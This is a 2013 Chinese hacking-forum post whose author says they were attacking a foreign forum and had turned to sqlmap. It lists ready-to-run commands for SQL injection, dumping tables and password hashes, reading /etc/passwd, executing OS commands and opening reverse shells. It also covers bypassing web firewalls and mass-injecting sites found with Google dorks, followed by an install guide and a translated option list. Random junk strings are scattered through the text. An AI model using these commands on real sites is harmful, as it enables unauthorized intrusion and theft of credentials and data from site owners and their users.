找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2693|回复: 0
打印 上一主题 下一主题

sqlmap注入命令的使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:26:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、1 b% W! p1 _# J3 f  n
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称( _& U% d% F# I+ @
sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名
2 v! o4 X8 B8 R. O, r% `sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
' ~. a: |: A& J8 ?5 f- O
- M% b; }! K; }sqlmap  -u  “http://url/news?id=1″  –dump  -C  “column_name”  -T “table_name”-D “db_name”-v& W4 }6 w# M7 h
0 #获取字段内容
3 K) _' w$ E9 k6 `: W 4 k! _4 O$ A8 u0 @. e# `- m* U
******************信息获取******************
* E1 A  [( \3 O/ `5 osqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型
7 I7 V* z$ k+ @' D' ]sqlmap -u “http://url/news?id=1″ –users #列数据库用户# n- A$ h/ K2 U9 t9 m0 O/ Y
sqlmap -u “http://url/news?id=1″ –dbs#列数据库
! d4 L, D# A1 a, t6 l$ m. T* Asqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码) G  @/ Z- R% x2 w. O3 I6 M
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码' E! |) O8 i- a, E: B
sqlmap  -u  “http://url/news?id=1″   –dump  -C  “password,user,id”  -T “tablename”-D “db_name”
) M" j2 }6 r8 B7 j–start 1 –stop 20 #列出指定字段,列出20 条/ [4 M8 `, E, I- z$ _8 M
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表& `5 |6 D/ G% W1 q6 z' f
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
4 g& a* D* w8 }* x! Qsqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色' B! K# w7 X; N# m4 p9 Y
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
7 S2 Y7 ^* X# P; c  h# z5 Asqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表- w6 u2 X) V+ Q& C" C
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
: m4 g8 P( |  ^8 Z+ qsqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
, H3 j1 m- w0 \) usqlmap -u “http://url/news?id=1″-b #获取banner信息0 z) N, |2 l' Y
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入
5 a! G6 f" m6 l' Gsqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型% A' ?$ @; S4 M
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入$ R/ `% q2 p, u7 O$ o
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词3 b, ?9 R9 @3 q* T9 `- ]+ o
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
& m7 U3 v1 G- ^9 a0 osqlmap -u “http://url/news?id=1″ –file /etc/passwd+ q0 p3 M( ?! P) n2 h0 o4 w5 t
sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令, X* r' T4 ]# Y0 j- W  j
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell1 c/ t! v: [1 u6 }
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表1 h- |; S% f: D" ^  V
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度9 M, p" C% j5 g, P
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度8 `& s& x  ~& y; o! O
***********高级用法*************
( j9 j* O4 d& z) y! R4 ]-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入7 ?: k+ }# P: y4 e: p/ E4 x/ l" W: o
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段          需保证google.com能正常访问
2 ]- {, y( }/ C5 \–technique   测试指定注入类型\使用的技术2 j% @+ v: y, X/ H
不加参数默认测试所有注入技术
: a6 M3 V$ X* c+ ~" x•     B: 基于布尔的SQL 盲注
% p7 T, g2 M1 i' z8 |. I! a•     E: 基于显错sql 注入& v! b% x+ i2 q$ N6 z1 q0 m
•     U: 基于UNION 注入, C! F; A- j; W/ c% y% Z! w$ C. x
•     S: 叠层sql 注入
) }- S5 Z7 I( I. G+ D3 D0 r, u•     T: 基于时间盲注" W9 r' I/ F. J2 N8 s/ s
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()9 [+ y4 f# @0 P
–tamper 插件所在目录3 B9 |, ~) X# O
\sqlmap-dev\tamper
8 p3 A8 A/ q5 M5 e" ^/ ysqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能
) k9 p/ B3 X) rlevel 执行测试等级 攻击实例:5 ^: S& B- L# e* Y9 w
Sqlmap -u “http://url/news?id=1&Submit=Submit”, e( b: g1 ^  a& g
–cookie=”PHPSESSID=41aa833e6d0d
/ s. @0 Q: t: i# S- k7 n2 C28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user3 m/ a/ g6 C' O0 q0 ^
–password8 F" P7 s+ O  B- w2 D, \  R
参考文档:http://sqlmap.sourceforge.net/doc/README.html
2 ^# \& [- U1 N***********安装最新版本*************
( F- h+ d# z- n- g+ r$ Wubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
9 i0 S3 s: Z+ U/ }3 V* ]  fsudo   svn   checkout   https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
9 K3 d" S; C2 p4 {) |# J, K安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件7 F) H/ s+ O" W8 X( e
sudo vim /home/当前用户/.bashrc
& Y+ t' X8 B% W& f! g7 B$ f/ N; d$ E#任意位置加上:
2 B; J- k" q( v* o! Y- R7 z. g* Ualias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效
' _' W" N- i4 I& h* _  y如果想对所有用户有效 可设置全局 编辑下面的文件6 b7 ?" Q+ A: s* k# ~% @9 ^7 l
vim /etc/profile
, i7 U  u2 |/ U/ {  {! ^同样加上:
3 k# D* d" B* y. M# `8 |alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
. @% H' x' B7 E+ C# b+ i; N/ B******************windows 7 (x64) sqlmap install (SVN)************
9 H+ n/ ~; w% `8 v, B  nhttp://www.python.org/getit/ 安装python
7 v. C2 \; Z3 V- y. whttp://www.sliksvn.com/en/download 安装windows svn client# Q. C' y* q# r/ S1 I6 @- Q
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev. K6 `- C; m1 {
安装sqlmap1 d) ]  v2 D+ W% n& p
*修改环境变量5 h9 D) \( v+ ^3 i- B
–version             显示程序的版本号并退出2 c  Y1 F% c% v2 w/ z) Q3 M
-h, –help            显示此帮助消息并退出  q* u% G" j& A
-v VERBOSE            详细级别:0-6(默认为1)/ l" e1 Y: a4 J* |4 j2 R
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。8 S4 |8 c5 ]7 C8 g' r6 d
-d DIRECT           直接连接到数据库。
) _* c6 l+ l( L+ k: ?-u URL, –url=URL   目标URL。* G4 |7 g) `! N# E% P  \
-l LIST             从Burp 或WebScarab 代理的日志中解析目标。
% t6 T3 }4 g/ y" U* O2 b2 l( a-r REQUESTFILE      从一个文件中载入HTTP 请求。. _/ q  G/ `8 Z  _4 w* V
-g GOOGLEDORK       处理Google dork 的结果作为目标URL。
1 R# U# f# ~% A3 p" F, K-c CONFIGFILE       从INI 配置文件中加载选项。& j' G+ s' P# X0 y
Request(请求)::
* N2 G: l; _3 T. X$ A7 a这些选项可以用来指定如何连接到目标URL。
" V2 D2 ~' |/ H1 ^–data=DATA         通过POST 发送的数据字符串# [! K1 S+ h+ o8 k+ m/ T( e
–cookie=COOKIE     HTTP Cookie 头
* c/ M" X# L4 }, s5 z9 s–cookie-urlencode  URL 编码生成的cookie 注入
/ r: q: J) e  O) [–drop-set-cookie   忽略响应的Set –Cookie 头信息
+ X( j' w  B1 m
. A! y% y+ s2 T1 O. g. k–user-agent=AGENT  指定  HTTP User –Agent 头
; @% L6 V3 y5 b; X, p3 ?–random-agent      使用随机选定的HTTP User –Agent 头7 Y2 P5 @9 x1 Z% L: k% o+ l$ [
–referer=REFERER   指定  HTTP Referer 头
4 v/ J$ D* s3 u$ h4 P–headers=HEADERS   换行分开,加入其他的HTTP 头, b2 H: r, v0 u" W. ?0 {8 z' r
–auth-type=ATYPE   HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)3 P8 F! a0 J7 t' s
–auth-cred=ACRED   HTTP 身份验证凭据(用户名:密码)  d+ j1 N+ D) j6 C6 {/ b2 J
–auth-cert=ACERT   HTTP 认证证书(key_file,cert_file)
( D6 i( P" c& P# T–proxy=PROXY       使用HTTP 代理连接到目标URL
4 w2 _$ Y2 i1 Q9 \. v/ D, D–proxy-cred=PCRED  HTTP 代理身份验证凭据(用户名:密码)
6 F' Y$ N* l1 [; e/ z: |–ignore-proxy      忽略系统默认的HTTP 代理
$ m6 P' Q! r% x' a; L( P–delay=DELAY       在每个HTTP 请求之间的延迟时间,单位为秒
- k( u/ B# n- [$ K; U+ w! Y3 ~–timeout=TIMEOUT   等待连接超时的时间(默认为30 秒)
* G. F$ E/ i" H( P–retries=RETRIES   连接超时后重新连接的时间(默认3)
/ E+ y3 r" Z$ n–scope=SCOPE       从所提供的代理日志中过滤器目标的正则表达式! F$ e. o9 ~6 _6 R+ u
–safe-url=SAFURL   在测试过程中经常访问的url 地址
- h" H! k( m" u1 D8 T6 T, B–safe-freq=SAFREQ  两次访问之间测试请求,给出安全的URL0 w  W( n/ l7 f/ m8 t) x6 F8 D
Optimization(优化): 这些选项可用于优化SqlMap 的性能。
9 Q2 H: S" W8 G3 O' \-o                  开启所有优化开关
3 U; b2 F( H8 `  C–predict-output    预测常见的查询输出- F$ ]$ w4 Q9 S' D% `+ A: o/ L" q
–keep-alive        使用持久的HTTP(S)连接: Z5 R/ Y$ W  b: ]# {5 b3 s
–null-connection   从没有实际的HTTP 响应体中检索页面长度
$ t0 i/ D' N$ s–threads=THREADS   最大的HTTP(S)请求并发量(默认为1)5 T* I1 a, u3 P+ v" A
Injection(注入):) O; r  h# J) T
这些选项可以用来指定测试哪些参数,  提供自定义的注入payloads 和可选篡改脚本。% [% a- [0 V' e$ ?1 P6 r3 Y3 S
-p TESTPARAMETER    可测试的参数(S)5 b7 W  {8 A1 t; J
–dbms=DBMS         强制后端的DBMS 为此值4 ?  A( L' T3 g0 F
–os=OS             强制后端的DBMS 操作系统为这个值+ D1 M% P9 D3 r1 N
–prefix=PREFIX     注入payload 字符串前缀, ?1 u( Q' u2 j$ p
–suffix=SUFFIX     注入 payload 字符串后缀
4 P, Z- N1 q4 J. Y  d–tamper=TAMPER     使用给定的脚本(S)篡改注入数据
1 j4 X. F8 ^4 Z. y$ LDetection(检测):
8 O9 L& M/ n+ n0 r! g9 j* J这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。/ F% z0 j+ b6 w8 q2 _7 m4 T% h
–level=LEVEL       执行测试的等级(1-5,默认为1)% `4 S4 Z  J. r; L
–risk=RISK         执行测试的风险(0-3,默认为1)/ R6 w  n: l- c
–string=STRING     查询时有效时在页面匹配字符串6 D  W" r5 l6 T' O! `" N# {
–regexp=REGEXP     查询时有效时在页面匹配正则表达式( m9 X$ _/ l+ q; w9 [; y: a/ q$ w
–text-only         仅基于在文本内容比较网页0 u; j; ^9 _% H* w. B4 X) Z0 Y
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。
6 m/ y  |+ \! y, {! o# M–technique=TECH    SQL 注入技术测试(默认BEUST)
6 T( g2 G, {% {–time-sec=TIMESEC  DBMS 响应的延迟时间(默认为5 秒)% N. {) Y2 E9 [2 b( J0 r
–union-cols=UCOLS  定列范围用于测试UNION 查询注入0 X# n6 z$ N" U2 m2 j
–union-char=UCHAR  用于暴力猜解列数的字符4 _) [. k- _5 h2 ?+ x. m
Fingerprint(指纹):3 G- g( {% D/ f4 r' x5 h8 M
-f, –fingerprint     执行检查广泛的DBMS 版本指纹/ {0 {$ k8 d, L. C$ S8 I# U
Enumeration(枚举):& {7 A  ^! m* S; y2 Y
  ?: ?( M" }$ U( I# E
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
  _5 l7 C, ~: Q( ~0 Y: z! {& ^-b, –banner        检索数据库管理系统的标识
6 S2 D' g; _( {: [- X–current-user      检索数据库管理系统当前用户% k4 V4 X3 ?% f
–current-db        检索数据库管理系统当前数据库
: o6 p9 Q0 y1 u% O2 Q–is-dba            检测DBMS 当前用户是否DBA! Q& `$ A) Z6 ?1 I0 V
–users             枚举数据库管理系统用户7 c4 p" k' J$ I# l3 _7 D
–passwords         枚举数据库管理系统用户密码哈希( Z! @  r/ m6 K7 c, e
–privileges        枚举数据库管理系统用户的权限) C! Z0 C0 H7 I( g
–roles             枚举数据库管理系统用户的角色; q/ O( q% p5 [! l0 M8 W
–dbs               枚举数据库管理系统数据库
; N* ?3 ^- r8 M, n& T–tables            枚举的DBMS 数据库中的表" Y' _# w* r: s* {
–columns           枚举DBMS 数据库表列
, l0 U2 S( i3 C* R1 d$ C( z& H* Q–dump              转储数据库管理系统的数据库中的表项8 \) j, E2 P3 Z( B3 S+ k2 T3 t
–dump-all          转储所有的DBMS 数据库表中的条目) A& `% S0 X6 \' ?5 M
–search            搜索列(S),表(S)和/或数据库名称(S)1 C$ a% e6 I6 t+ f3 M* \
-D DB               要进行枚举的数据库名
8 {" ]: }$ N0 ]" G5 ?8 X' x! Z-T TBL              要进行枚举的数据库表8 I, u7 y+ f( j5 z' f# G
-C COL              要进行枚举的数据库列+ v4 u6 m% _' b$ k! G
-U USER             用来进行枚举的数据库用户
3 t, l$ T7 K8 g& P; g# N+ J0 ^; g( c–exclude-sysdbs    枚举表时排除系统数据库
9 L+ Y1 J+ p, F–start=LIMITSTART  第一个查询输出进入检索: ~  U- ?+ P3 u. j
–stop=LIMITSTOP    最后查询的输出进入检索  y6 [8 c0 Q- M
–first=FIRSTCHAR   第一个查询输出字的字符检索# _9 N0 R& r! ^( y( Y5 L2 _$ l) p
–last=LASTCHAR     最后查询的输出字字符检索
. \  `7 t! W# I0 p9 p–sql-query=QUERY   要执行的SQL 语句
' u% O: H/ j( a/ P1 L/ P–sql-shell         提示交互式SQL 的shell
* t/ \( x2 C+ r( LBrute force(蛮力): 这些选项可以被用来运行蛮力检查。
! M' r, c) I5 H5 J' q–common-tables     检查存在共同表/ e+ Q9 e" {& \9 w; B. h
–common-columns    检查存在共同列
+ W1 R2 Z& I& [2 W( d8 S- c1 K$ GUser-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。! V1 J* a! F* ]. k
–udf-inject        注入用户自定义函数: w4 ]5 d8 v/ k, `) w5 h" D* _3 C
–shared-lib=SHLIB  共享库的本地路径) z5 @- n3 Y  M; _/ K' n" y3 x
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
; j* ~0 p' v% n( u2 G0 H–file-read=RFILE   从后端的数据库管理系统文件系统读取文件( j' p+ o  k- U9 X4 F; x$ Y& `
–file-write=WFILE  编辑后端的数据库管理系统文件系统上的本地文件! \: r3 h6 ^8 P8 @
–file-dest=DFILE   后端的数据库管理系统写入文件的绝对路径
3 ^9 F4 [. T. F0 B9 ]( FOperating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
) k6 A( M* O5 {3 }9 e' `' z4 i–os-cmd=OSCMD      执行操作系统命令7 M' w; @5 Y; w3 H$ s
–os-shell          交互式的操作系统的shell
. O$ N' T0 C7 @+ t1 A1 E6 _–os-pwn            获取一个OOB shell,meterpreter 或VNC
4 T/ _5 N1 N5 U2 W–os-smbrelay       一键获取一个OOB shell,meterpreter 或VNC
4 {0 o' X0 @  R) V–os-bof            存储过程缓冲区溢出利用
9 p4 n# l6 R  |: b–priv-esc          数据库进程用户权限提升
. t9 S) Z: e7 R1 @–msf-path=MSFPATH  Metasploit Framework 本地的安装路径$ `9 N! g6 l# [9 ]6 V$ W
–tmp-path=TMPPATH  远程临时文件目录的绝对路径! d# ?: Y0 m/ P
! B, P0 C  j  B3 ?
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
: U5 n. T9 _' s4 p6 r–reg-read          读一个Windows 注册表项值
/ w9 I1 x% j% ?2 F; s–reg-add           写一个Windows 注册表项值数据/ ~: ^3 L$ J& k( J& D: ~* Z8 h
–reg-del           删除Windows 注册表键值+ Y7 Y" L. D; s
–reg-key=REGKEY    Windows 注册表键
( ^1 T" ]( A4 N3 p" p! g8 a4 @–reg-value=REGVAL  Windows 注册表项值
6 f  a/ K" G) e+ e+ T0 W( ?8 D' w6 h–reg-data=REGDATA  Windows 注册表键值数据( L! \" r5 G$ Z1 R
–reg-type=REGTYPE  Windows 注册表项值类型
! M9 b4 i$ w9 @General(一般): 这些选项可以用来设置一些一般的工作参数。
, x, I. ]# w1 h/ y9 A  \7 C6 q-t TRAFFICFILE      记录所有HTTP 流量到一个文本文件中; m3 z! m3 t- o, a
-s SESSIONFILE      保存和恢复检索会话文件的所有数据
9 z$ {1 x* n. \9 D- E: \–flush-session     刷新当前目标的会话文件: N. \- r0 d8 f4 D
–fresh-queries     忽略在会话文件中存储的查询结果
& v6 ], k" {1 [( i; b% h0 i–eta               显示每个输出的预计到达时间
% `) b/ O" s5 N6 M–update            更新SqlMap
( M9 `/ T/ e0 f0 M3 g7 ~6 j–save              file 保存选项到INI 配置文件
& S$ Z5 B" @  v8 |) y–batch             从不询问用户输入,使用所有默认配置。
$ l  c& A2 X! m8 Y5 D5 F# P# j8 iMiscellaneous(杂项):
% r  \) s3 [' }. I: K1 C, Y- m–beep              发现SQL 注入时提醒, i+ J# s# b& U
–check-payload     IDS 对注入payloads 的检测测试
* q5 p/ o8 ^- p9 `–cleanup           SqlMap 具体的UDF 和表清理DBMS4 W* J! f6 `( [' \) \' ]
–forms             对目标URL 的解析和测试形式! `' B: w: S2 y* G; M  I
–gpage=GOOGLEPAGE  从指定的页码使用谷歌dork 结果0 H# M4 _+ Z; }" o. w9 [: w  v2 F, D
–page-rank         Google dork 结果显示网页排名(PR)/ V/ [3 u; P7 e
–parse-errors      从响应页面解析数据库管理系统的错误消息. Q4 q: d9 l  w- `7 z) W
–replicate         复制转储的数据到一个sqlite3 数据库, Q0 i/ b# M( C0 T; B) M/ |% s
–tor               使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
6 U3 c1 F' E8 S/ a–wizard            给初级用户的简单向导界面
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表